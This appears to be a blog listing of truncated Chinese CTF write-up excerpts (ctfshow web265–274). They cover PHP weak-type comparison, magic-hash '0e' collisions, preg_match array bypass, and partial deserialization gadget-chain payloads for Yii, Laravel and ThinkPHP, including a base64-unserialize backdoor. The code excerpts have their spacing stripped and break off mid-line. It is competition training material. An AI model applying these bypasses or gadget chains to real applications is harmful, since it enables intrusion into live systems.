弱类型比较 'abc'0true '1235a'>1234true '1234a'1234true并且is_numeric('1234a')false常考 'admin1'0true '1admin'1true '0e123456''0e23456'true “0e123456”“0e456789”相互比较的时候，会将0e这类字符串识别为科学技术法的数字， 0的无论多少次方都是零，所以相等。 总的来说：字符串的开始部分决定了它的值，如果该字符串以合法的数值开始，则使用该数值，否则其值为0 数组绕过 preg_match当检测的变量是数组的时候会报错并返回0 而intval函数当传入...

CTFSHOWweb265 <?php error_reporting(0); include('flag.php'); highlight_file(__FILE__); classctfshowAdmin{ public$token; public$password; publicfunction__construct($t,$p){ $this->token=$t; $this->password=$p; } publicfunctionlogin(){ return$this->token=$this->password; } } $ctfsho...

ctfshowweb266 <?php highlight_file(__FILE__); include('flag.php'); $cs=file_get_contents('php://input'); classctfshow{ public$username='xxxxxx'; public$password='xxxxxx'; publicfunction__construct($u,$p){ $this->username=$u; $this->password=$p; } publicfunctionlogin(){ return$this-&gt...

ctfshowweb267 通过页面加载yii.js判断使用yii框架。 用弱口令admin/admin可登录 在about页面发现提示view-source 访问提示页面 ?r=site%2Fabout&view-source 页面提示 ///backdoor/shell unserialize(base64_decode($_GET['code'])) 因此构造payload必须先base64_encode再serialize payload获得 <?php namespaceyii\rest{ classIndexAction{ public$checkAccess;...

ctfshowweb271 <?php define('LARAVEL_START',microtime(true)); require__DIR__.'/../vendor/autoload.php'; / |-------------------------------------------------------------------------- |TurnOnTheLights |-------------------------------------------------------------------------- | |Weneedtoillumi...

ctfshowweb274 <?php namespacethink\process\pipes{ usethink\model\Pivot; classWindows { private$files=[]; publicfunction__construct(){ $this->files[]=newPivot(); } } } namespacethink{ abstractclassModel { protected$append=[]; private$data=[]; publicfunction__construct(){ $this->data=arra...